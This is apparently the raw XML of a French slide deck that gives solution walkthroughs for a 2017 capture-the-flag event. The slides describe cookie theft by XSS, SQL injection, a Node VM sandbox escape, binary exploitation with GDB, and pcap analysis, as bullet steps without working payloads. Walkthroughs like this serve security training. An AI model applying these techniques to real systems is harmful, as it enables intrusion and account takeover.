          <a:xfrm>
            <a:off x="184245" y="2045272"/>
            <a:ext cx="4503761" cy="307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3600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400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686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9728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/>
              <a:t>Ouvrir South Park</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2100"/>
              <a:t>Trouver le bon poste</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700"/>
              <a:t>(ou offrir un café ! :D )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2100"/>
              <a:t>Soulever le clavier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2100"/>
              <a:t>Prendre une photo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2100"/>
              <a:t>That’s all !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4253463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Danger Zone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/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Ouvrir Archer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Ouvrir une connexion sur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2300" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh://cflix:22222</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Aller dans le dossier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2300" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Analyser le fichier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>capture_interessante.pcap</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>tcpdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>qns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 0 -X -r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>capture_interessante.pcap</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>tcpdump -qns 0 -A -r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>capture_interessante</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>.pcap</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>That’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> all !</a:t>
            </a:r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041BCEF-F7E9-49A8-BA4A-DD7AD68E9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PCAP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Graphique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030" y="3023816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919" y="284175"/>
            <a:ext cx="9201555" cy="1394499"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Cflix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> – challenge 2017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183667"/>
                  </p:ext>
                </p:extLst>
              </p:nvPr>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="695864" y="2011363"/>
              <a:ext cx="10834777" cy="4206875"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.microsoft.com/office/powerpoint/2016/summaryzoom">
                <psuz:summaryZm>
                  <psuz:summaryZmObj sectionId="{D3D83F7A-BA90-4E2B-984B-BC89754314E8}" offsetFactorX="-59029" offsetFactorY="54681">
                    <psuz:zmPr id="{C91396DE-51D0-46F1-AFFA-427B48D480B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167" y="1182404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D898C2D-C432-48EA-83E4-934662304A3C}" offsetFactorX="-52388" offsetFactorY="54681">
                    <psuz:zmPr id="{B7375AD3-2283-4FC6-9EE1-BD70B050FA8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17374" y="1182404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EAD1F0A-9B9E-481D-B38F-0C1676382711}" offsetFactorX="162843" offsetFactorY="-52623">
                    <psuz:zmPr id="{936BB7BF-5352-4F7F-AA4B-00676CCAA47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69267" y="1170339"/>
                          <a:ext cx="3365499" cy="18930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/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95864" y="2011363"/>
                <a:ext cx="10834777" cy="4206875"/>
                <a:chOff x="695864" y="2011363"/>
                <a:chExt cx="10834777" cy="4206875"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="3" name="Imag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8031" y="319376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13238" y="3193767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5131" y="3181702"/>
                  <a:ext cx="3365499" cy="18930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1" name="Graphique 1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3464" y="5791201"/>
            <a:ext cx="3999576" cy="8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0203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2681" y="284176"/>
            <a:ext cx="9561793" cy="1421794"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Write-up : Lu et approuvé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886" y="4525069"/>
            <a:ext cx="1833255" cy="183325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73" y="1992865"/>
            <a:ext cx="7380972" cy="47048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141" y="4769257"/>
            <a:ext cx="9062207" cy="19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2681" y="284176"/>
            <a:ext cx="9561793" cy="1414970"/>
          </a:xfrm>
        </p:spPr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good man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886" y="4525069"/>
            <a:ext cx="1833255" cy="18332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58" y="2060811"/>
            <a:ext cx="7674342" cy="4588277"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 4" descr="Une image contenant plancher, fenêtre, personne, intérieur&#10;&#10;Description générée avec un niveau de confiance très élevé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438" y="4647559"/>
            <a:ext cx="3558274" cy="20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5" y="1117460"/>
            <a:ext cx="4851141" cy="4581633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072994" y="2168106"/>
            <a:ext cx="6115830" cy="17712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SEMAINE #3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Voulez-vous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aspirine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110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85325" cy="1238486"/>
          </a:xfrm>
        </p:spPr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genius</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0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FB1EDC9D-A7A1-4515-B008-AF9CB706D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2576" y="2212258"/>
            <a:ext cx="7114823" cy="4002088"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Graphique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" y="4525069"/>
            <a:ext cx="1833255" cy="18332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7BDFA40-A49A-41EC-943D-B2D8B83F19FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="339213" y="2212258"/>
            <a:ext cx="4253363" cy="224373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Big Bang Theory</a:t>
            </a:r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Enregistrer l’image</a:t>
            </a:r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Dézipper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> l’image et récupérer le code source</a:t>
            </a:r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Rétro-engineering le code</a:t>
            </a:r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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="369887844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La contre-attaque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D05510-F6D1-493E-9D21-7C5AAE104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A9 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Node</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> IIFE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9213" y="2212258"/>
            <a:ext cx="4041718" cy="24998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Shingeki No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>Kyojin</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/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Envoyer un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> en POST à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://a08chalen001/cookie</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/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Lire le fichier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>README.md</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-3600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2272" y="4734629"/>
            <a:ext cx="1833255" cy="18332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268" y="2019867"/>
            <a:ext cx="7434228" cy="44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La vérité éclate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/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Ouvrir House of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Cards</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Utiliser les identifiants trouvés à l’étape précédente</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Découvrir l’horrible vérité ! D:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Sortir de la VM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Bypass la vérification des commandes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Exploiter la vulnérabilité de VM.js</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Lire le code source du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Récupérer le code du missile nucléaire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>That’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> all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299CB2-AB9E-476B-A7E6-8C47B052C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A9 : Node VM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030" y="3023816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1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2063D72-279A-4CDD-98C2-BA3D69DE0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/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>Ouvrir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>Stranger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>Things</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>Repartir du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NodeJS</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>Déclencher une nouvelle guerre en lançant une bombe nucléaire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>Taper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> et aller dans </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>will.byers</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>Exploiter le binaire en C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>Utiliser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> pour lister les fonctions du programme</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>Utiliser GDB pour comprendre le programme</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>Trouver l’offset de la fonction faille</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>Lire le fichier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MyLittleToDoList.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"/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C étrange tout cela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21C2C-5C00-4A13-9E1A-8784DDE0D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Exploit binaire C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4606" y="3206385"/>
            <a:ext cx="1362102" cy="13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B601BD4-C173-4F1C-BF11-41ADF261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47" y="2045272"/>
            <a:ext cx="7438356" cy="4605706"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Graphique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La boucle est bouclée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8E68D9-9AF9-498A-9BE1-92EFB206A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A3 : XSS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E715ED-35BA-4B13-A050-B66EC4504ACE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="339213" y="2212258"/>
            <a:ext cx="4252934" cy="2993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Aller sur cds.hackdumb.com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Exploiter le formulaire de la page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>contact.php</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill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Forger une XSS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Récupérer le cookie d’Elliot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Accéder à son interface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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="414751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6119690" y="1601176"/>
            <a:ext cx="5760026" cy="1586524"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="5400" dirty="0"/>
              <a:t>Merci à tous pour votre participation !</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Graphique 1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0226" y="5226921"/>
            <a:ext cx="4422298" cy="944344"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Graphique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275" y="1117460"/>
            <a:ext cx="4851140" cy="4581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41098A-6CD6-42CE-93BB-C9C697F51F5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="3757495"/>
            <a:ext cx="5783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RDV l’année prochaine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="32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05383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6119690" y="1601176"/>
            <a:ext cx="5760026" cy="1637324"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="5100" dirty="0"/>
              <a:t>Envoyez-nous vos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="5100" dirty="0" err="1"/>
              <a:t>write-ups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="5100" dirty="0"/>
              <a:t> !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="5100" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="6500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Graphique 1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0226" y="5226921"/>
            <a:ext cx="4422298" cy="944344"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Graphique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275" y="1117460"/>
            <a:ext cx="4851140" cy="4581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41098A-6CD6-42CE-93BB-C9C697F51F5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="3757495"/>
            <a:ext cx="5783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RDV l’année prochaine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="32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361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5" y="1117460"/>
            <a:ext cx="4851141" cy="4581633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SEMAINE #1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L’échauffement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> commence !</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="297988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La contre-attaque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2750" y="2212258"/>
            <a:ext cx="6870036" cy="4355626"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="ZoneTexte 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="339213" y="2212258"/>
            <a:ext cx="4579374" cy="24998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Ouvrir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>Better</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> Call Saul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Clic droit &gt; Afficher la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2272" y="4734629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0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BugFinder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16F88-47F1-4E6B-ABBF-0B0D78A42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39213" y="2212258"/>
            <a:ext cx="4579374" cy="2993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Breaking Bad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Revenir sur l’accueil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Exploiter le champ de recherche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Déterminer le nb de colonne et leur type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Découvrir la structure de la BDD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Récupérer les bons champs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35" y="2024800"/>
            <a:ext cx="7225466" cy="46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9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Avocat incontestable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93EEAFC-6DA7-44F6-8BD3-77B9CD116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A3 : XSS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706" y="4222838"/>
            <a:ext cx="1833255" cy="183325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40" y="1935673"/>
            <a:ext cx="7518781" cy="479267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936173" y="1989534"/>
            <a:ext cx="3930555" cy="26848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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>Better</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> Call Saul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Clic droit &gt; Afficher la source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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="232182463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Write-up : Avocat incontestable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995E9F-F254-4148-A6F8-4E14F9FB3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A3 : XSS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706" y="4222838"/>
            <a:ext cx="1833255" cy="18332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42" y="1928848"/>
            <a:ext cx="7518780" cy="4792673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936173" y="1989534"/>
            <a:ext cx="3930555" cy="26848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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>Better</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> Call Saul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Clic droit &gt; Afficher la source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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="332669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Write-up : Avocat incontestable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716C6F-D31F-43FB-B447-9A3920CD0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A3 : XSS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936173" y="1989534"/>
            <a:ext cx="3930555" cy="26848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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>Better</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> Call Saul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Clic droit &gt; Afficher la source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706" y="4222838"/>
            <a:ext cx="1833255" cy="18332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40" y="1942495"/>
            <a:ext cx="7518781" cy="48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Jeu de pouvoir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2194115"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0"/>
              <a:t>Ouvrir Game of Thrones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0"/>
              <a:t>Clic droit &gt; Afficher la source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0" err="1"/>
              <a:t>Désobfusquer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0"/>
              <a:t> la 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" baseline="30000" dirty="0"/>
              <a:t>ème</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0"/>
              <a:t> ligne de JS sur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jsbeautifier.org</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0"/>
              <a:t>Résoudre le flag en faisant les opérations inverse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0"/>
              <a:t>Retourner le tableau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0"/>
              <a:t>Enlever 20 sur la valeur Unicode d’un caractère sur deux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0"/>
              <a:t>Reconvertir en string normale</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0"/>
              <a:t>Base64 -&gt; ASCII</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0"/>
              <a:t>Code César (ROT 13)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0" err="1"/>
              <a:t>That’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" dirty="0"/>
              <a:t> all !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84DC99-DBF6-4575-8A6C-CA318052F0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A3 : XSS Obfusqué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030" y="3023816"/>
            <a:ext cx="1833255" cy="1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2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BugFinder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58A1B7-1930-432B-8E48-E996E5D9E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A1 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>SQLi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39213" y="2212258"/>
            <a:ext cx="4579374" cy="2993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Breaking Bad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Revenir sur l’accueil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Exploiter le champ de recherche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Déterminer le nb de colonnes et leurs types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Découvrir la structure de la BDD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Récupérer les bons champs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36" y="2045272"/>
            <a:ext cx="7225466" cy="4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Write-up : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>BugFinder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AE8E9C-8EEF-48F8-9839-4E263F3AB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A1 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>SQLi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39213" y="2212258"/>
            <a:ext cx="4579374" cy="2993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Ouvrir Breaking Bad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Revenir sur l’accueil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Exploiter le champ de recherche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Déterminer le nb de colonnes et leurs types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fr-FR" sz="2000" dirty="0"/>
              <a:t>Découvrir la structure de la BDD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/>
              <a:t>Récupérer les bons champs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fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>That’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> all !</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Graphique 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849" y="5205782"/>
            <a:ext cx="1362102" cy="13621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037" y="2045272"/>
            <a:ext cx="7225466" cy="4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81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Personnalisé 5">
      <a:dk1>
        <a:srgbClr val="FFFFFF"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="CB473C"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="1F3244"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="CB473C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Conception personnalisée">
  <a:themeElements>
    <a:clrScheme name="Personnalisé 6">
      <a:dk1>
        <a:srgbClr val="1F3244"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="1F3244"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FFFFFF"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="CB473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1735</TotalTime>
  <Words>1747</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Grand écran</PresentationFormat>
